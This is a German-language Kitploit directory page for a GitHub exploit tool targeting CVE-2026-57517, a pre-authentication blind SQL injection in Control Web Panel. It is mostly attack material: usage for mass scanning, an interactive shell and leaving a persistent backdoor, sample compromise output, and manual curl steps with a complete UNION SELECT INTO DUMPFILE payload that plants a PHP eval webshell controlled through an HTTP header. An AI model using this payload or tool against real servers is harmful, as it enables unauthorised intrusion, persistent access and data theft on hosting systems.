Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-57517 — 💉 Blind SQL Injection → RCE-Exploit für Control Web Panel (CWP) ≤ 0.9.8.1224 — userRes POST → INTO DUMPFILE → cwpsvc-Shell | Kitploit
Tools/GitHubGitHub/shinthink/cve-2026-57517
SchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHubshinthink/cve-2026-57517

CVE-2026-57517

💉 Blind SQL Injection → RCE-Exploit für Control Web Panel (CWP) ≤ 0.9.8.1224 — userRes POST → INTO DUMPFILE → cwpsvc-Shell

Repository anzeigen
119vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-57517 — Control Web Panel Blind SQLi → RCE

Python CVE CVSS License

Control Web Panel ≤ 0.9.8.1224 — Blind SQL Injection zu Remote Code Execution

Port 2083 → userRes POST → INTO DUMPFILE → Port 2031 Webshell → cwpsvc



🔴 Schwachstellenübersicht

CVE-2026-57517 ist eine kritische Blind-SQL-Injection vor der Authentifizierung in Control Web Panel (CWP) in Versionen ≤ 0.9.8.1224. Der POST-Parameter userRes am Endpunkt des Benutzerpanels wird nicht bereinigt, bevor er in eine SQL-Abfrage eingebettet wird. Die Abfragen werden mit MySQL-root-Rechten ausgeführt, und dieser Benutzer besitzt die globale FILE-Berechtigung, wodurch Angreifer über INTO DUMPFILE beliebige Dateien schreiben können.

Die typische Exploitation-Kette legt eine PHP-Webshell im webzugänglichen Roundcube-Logs-Verzeichnis ab und erreicht so Remote Code Execution mit dem Dienstkonto cwpsvc.

FeldDetail
CVECVE-2026-57517
CVSS9.8 (Kritisch) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
TypCWE-89 — Blind SQL Injection (Pre-Auth)
BetroffenControl Web Panel ≤ 0.9.8.1224
BehobenVersion 0.9.8.1225
Offenlegung1. Juli 2026
ForscherEgidio Romano (Karma In Security)
PoCÖffentlich — KIS-2026-12

📦 Installation

git clone https://github.com/shinthink/CVE-2026-57517.git
cd CVE-2026-57517
pip install -r requirements.txt

📖 Verwendung

# Single target (auto-detect username)
python cve_2026_57517.py -t 192.168.1.100

# Single target with known username
python cve_2026_57517.py -t 192.168.1.100 -u cwpsvc

# Mass scan
python cve_2026_57517.py -f targets.txt -o live.txt

# Interactive shell
python cve_2026_57517.py -t target.com --rce -u cwpsvc

# Persistent backdoor (no auto-cleanup)
python cve_2026_57517.py -t target.com --no-cleanup
  -t, --target      Single target host
  -f, --file        File with targets (one per line)
  -u, --username    CWP username (skips auto-detection)
  -o, --output      Live TXT output file
  --json            JSON report file
  --threads         Concurrent workers (default: 20)
  --timeout         Request timeout seconds (default: 15)
  --no-cleanup      Leave shells on target
  --rce             Interactive shell mode
  -v, --verbose     Verbose output

🧪 Proof of Concept

Szenario 1: Massen-Scan

$ python cve_2026_57517.py -f targets.txt -o live.txt -v
────────────────────────────────────────────────────────────
  CVE-2026-57517 | 5 targets | 20 threads
  Cleanup: yes
  Live TXT: live.txt
────────────────────────────────────────────────────────────

  ✅ 192.168.10.100:2083  [rce_confirmed]  18.2s
     User  : admin
     Shell : https://192.168.10.100:2031/roundcube/logs/cwp_a3f2b9c1d8e4.php
     RCE   : uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
             cwp-prod-01.example.com
     whoami: cwpsvc

  ⚠️ 192.168.10.200:2083  [sqli_failed]  12.1s
     User  : cwpsvc
     Error : SQL injection failed — target may be patched or path not writable

  · 192.168.10.50:2083  [not_cwp]  2.3s

==================================================
  SCAN SUMMARY
==================================================
  Total      : 5
  ✅ RCE      : 2
  ⚠️  SQLi Fail : 1
  🔍 No User  : 1
  ·  Not CWP  : 1
==================================================

Szenario 2: Interaktive Shell

$ python cve_2026_57517.py -t target.com --rce -u admin
  CWP Interactive Shell — target.com
  Type 'exit' to quit, 'cleanup' to remove shell

cwp$ id
uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)

cwp$ hostname
cwp-prod-01

cwp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
cwpsvc:x:1001:1001::/home/cwpsvc:/bin/bash

cwp$ exit

Szenario 3: Manuelle Reproduktion (curl)

Schritt 1 — Prüfen, ob CWP über Port 2083 erreichbar ist

curl -sk 'https://target.com:2083/' | grep -i 'control web panel\|CWP'

Schritt 2 — Benutzernamen validieren

curl -sk -o /dev/null -w "%{http_code}" 'https://target.com:2083/admin/'
# 200 = user exists

Schritt 3 — SQL-Injection über userRes

Der Payload verwendet einen 13-spaltigen UNION SELECT mit einer hex-kodierten PHP-Shell, die über INTO DUMPFILE geschrieben wird:

" UNION SELECT 1,0x{HEX_PHP_SHELL},3,4,5,6,7,8,9,10,11,12,13
INTO DUMPFILE '/usr/local/cwpsrv/var/services/roundcube/logs/shell.php' #
# The tool handles hex encoding automatically. Manual equivalent:
PAYLOAD='" UNION SELECT 1,0x3c3f706870206576616c286261736536345f6465636f646528245f5345525645525b22485454505f43225d29293b203f3e,3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE '\''/usr/local/cwpsrv/var/services/roundcube/logs/shell.php'\'' #'

curl -sk 'https://target.com:2083/admin/' \
  -d "userRes=$PAYLOAD"

Schritt 4 — Befehle über die Webshell ausführen (Port 2031)

Die eingesetzte PHP-Shell liest Befehle aus dem HTTP-Header C::

<?php eval(base64_decode($_SERVER['HTTP_C'])); ?>
# Base64-encode: print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';
PHP=$(echo "print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';" | base64 -w0)

curl -sk 'https://target.com:2031/roundcube/logs/shell.php' -H "C: $PHP"
# uid=1001(cwpsvc) gid=1001(cwpsvc)

Payload-Aufschlüsselung

KomponenteWert
SQL-Spalten13-spaltiger UNION SELECT
PHP-Webshell<?php eval(base64_decode($_SERVER['HTTP_C'])); ?>
Hex-KodierungMySQL 0x...-Hex-Literal
SchreibmethodeINTO DUMPFILE (binär exaktes Dateischreiben)
Zielpfad/usr/local/cwpsrv/var/services/roundcube/logs/{uniqid}.php
BefehlsübermittlungHTTP-Header C: mit base64-kodiertem PHP
Befehlsausführungpassthru(base64_decode('{cmd}'))

⚠️ Haftungsausschluss

Tool herunterladen